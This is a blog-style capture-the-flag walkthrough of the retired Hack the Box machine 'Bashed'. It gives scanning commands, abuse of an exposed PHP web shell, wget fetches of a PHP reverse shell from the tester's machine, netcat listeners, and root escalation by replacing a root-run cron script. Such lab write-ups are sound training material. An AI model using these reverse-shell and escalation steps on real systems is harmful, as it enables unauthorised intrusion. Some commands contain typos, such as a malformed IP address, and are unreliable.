Capture the flag (CTF)

Hack the Box (HTB) machines walkthrough series — Bashed

Security Ninja
May 16, 2019 by
Security Ninja

We are continuing with our review of Hack the Box (HTB) machines. HTB is an excellent platform that hosts machines belonging to multiple OSes. It also has some other challenges as well. Individuals have to solve the puzzle (simple enumeration plus pentest)  in order to log into the platform and download the VPN pack to connect to the machines hosted on the HTB platform.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Note: Writeups of only retired HTB machines are allowed. The machine in this article, named Bashed, is retired.

The walkthrough

Let’s start with this machine.

1. Download the VPN pack for the individual user and use the guidelines to log into the HTB VPN.

2. The “Bashed” machine IP is 10.10.10.68.

3. We will adopt the same methodology of performing penetration testing as we have used before. Let’s start with enumeration in order to learn more about the machine.

4. As usual, let’s start with the Nmap scan to gather more information about the services running on this machine. [CLICK IMAGES TO ENLARGE]

<<nmap -sC -sV -oA Bashed 10.10.10.68>>

5. As we can see, only port 80 is up, so we need to start the enumeration on that.

6. Let’s use gobuster to start the enumeration of the common directories.

<<gobuster -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20>>

7. Above, we can see that there are lot of enticing directories on this box, but the ones that catch our attention are dev and upload.

8. Browsing the dev directory, we can see that we have some .php files.

9. Clicking phpbash.php gives us an interactive Web shell, as we can see below.

10. We can easily browse to get the user.txt, as shown below.

<<cd /home>>

<< ls>>

<<cd arrexel>>

<<ls>>

<<cat user.txt>>

11. Since we want a proper shell, we need to find another way to get into this box. Since there are php files hosted on this server, let’s see if we can upload our reverse shell to the box.

12. First, let’s customize the shipped-in php reverse shell with our machine IP and the port on which we want to listen the connection.

13. On the same directory, let’s raise a Python Web server.

<<python -m SImpleHTTPServer>>

14. Since we have a Web shell, we can try to get this reverse shell via wget. But it looks like we don’t have the permission to create a new file.

<<wget http://10.10.10.14.9:8000/shell.php>>

15. The next step for us is to find the directory in which we can write.

16. Remember the uploads directory? We can browse there and check if we can download the shell.php.

17. As we can see below, we can download the shell there.

<<cd /var/www/html/uploads>>

<<wget http://10.10.10.14.9:8000/shell.php>>

 

18. Below, we can see that the request to fetch shell.php was indeed made.

19. As defined in the shell above, we require port 1234 to listen to, so let’s spin up that port.

<<nc -nlvp 1234>>

20. Browsing the directory http:/10.10.10.68/uploads/shell.php will execute our script and give us back the reverse shell as shown below.

<<cd /home>>

<< ls>>

<<cd arrexel>>

<<ls>>

<<cat user.txt>>

21. Again, we browse to fetch the user.txt.

22. First, let’s get a more interactive shell using the command below.

<<python -c “import pty;pty.spawn(‘/bin/bash’);”>>

23. Now we need to escalate our privileges on this box, so let’s start the enumeration again.

24. The first thing to always check for is what users can sudo as. Here we can see that the current user, arrexel, can run commands as scriptmanager.

<<sudo -l>>

25. The above finding means that we can change to the scriptmanager user as well.

<<sudo -u scriptmanager /bin/bash>>

26. After browsing into the / directory, it looks like all the files are owned by root, whereas only one file is owned by scriptmanager.

27. Enumerating this directory gives us a Python script and txt file. test.py is owned by scriptmanager and test.txt is owned by root.

<<ls -l>>

28. Looking into the contents of test.py reveals that the script indeed is writing to test.txt, which is owned by root.

<<cat test.py>>

29. Another thing we notice is that the test.txt update time was changing every minute. This means that the file test.py is run on a cron by root, which results on root.txt.

30. Now we can create a test.py file on our box like below. It can be grabbed from Pentest Monkey. Make sure to reset the IP address and port.

<<cat test.py>>

<<ip=10.10.14.9>>

<<port=4422>>

31. Now let’s grab this file to our victim server, as shown below.

<<wget http://10.10.10.14.9:8000/test.py>>

32. And spin up a listener in our attacking machine like so:

<<nc -nlvp 4422>>

 

33. Within a minute, we see that we got a call back with the root shell.

<<id>>

34. We browsed to get the root.txt file.

This was a simple and straightforward machine that relied on enumeration only.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

We will continue this series with further interesting HTB machines.

Security Ninja
Security Ninja